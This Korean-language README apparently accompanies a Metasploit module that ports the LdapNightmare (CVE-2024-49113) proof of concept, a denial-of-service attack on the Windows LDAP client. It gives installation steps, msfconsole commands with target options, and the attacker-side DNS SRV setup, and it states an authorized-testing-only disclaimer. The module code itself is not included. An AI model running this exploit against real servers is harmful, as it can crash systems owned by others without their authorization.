
SafeBreaches CVE-2024-49113 POC(LdapNightmare) Metasploit에 통합됨
SafeBreaches의 CVE-2024-49113 POC(LdapNightmare)를 Metasploit에 통합
이 모듈은 Windows LDAP 클라이언트의 심각한 취약점인 CVE-2024-49113을 구현하여 시스템 불안정을 유발할 수 있습니다. 이 모듈은 Metasploit 프레임워크와 통합되어, 이 취약점에 대한 시스템 복원력을 테스트할 수 있는 신뢰할 수 있는 방법을 제공합니다.
ldaptor
impacket
필수 Python 패키지를 설치합니다:
pip install -r requirements.txt
모듈을 Metasploit 모듈 디렉터리에 배치합니다:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
모듈이 실행 가능한지 확인합니다:
chmod +x ldapnightmare.py
msfconsole을 시작합니다:
msfconsole
모듈을 로드하고 구성합니다:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - 대상 주소 (필수)RPORT - RPC 대상 포트 (기본값: 49664)LPORT - LDAP 서버 로컬 포트 (기본값: 389)DOMAINNAME - 공격자의 도메인 이름 (필수). 이 도메인에는 특정 DNS SRV 레코드가 구성되어 있어야 합니다 (아래 도메인 구성 참조).ACCOUNT - 대상 계정 이름 (기본값: Administrator)SITENAME - 대상 사이트 이름 (기본값: 비어 있음)DOMAINNAME 매개변수에는 특정 DNS SRV 레코드가 구성되어 있어야 합니다. 도메인에는 다음 두 개의 SRV 레코드가 있어야 합니다:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostname중요 참고 사항: 공격자 머신의 호스트 이름은 피해 서버가 NBNS를 통해 이를 확인할 수 있는 경우에만 작동합니다. 또는 호스트 이름을 LDAP 서버의 IP 주소를 가리키는 도메인 이름으로 대체할 수 있습니다.
이 모듈은 세 가지 주요 단계로 작동합니다:
이 모듈은 공인된 보안 테스트 및 연구 목적으로만 사용됩니다. 사용자는 자신이 소유하지 않거나 테스트 권한이 없는 시스템을 테스트하기 전에 적절한 승인을 받아야 합니다.
이 모듈은 BSD 3-Clause 라이선스에 따라 배포됩니다.
이 작업은 다음의 코드를 포함하고 있습니다:
전체 라이선스 텍스트는 LICENSES 파일에서 확인할 수 있습니다.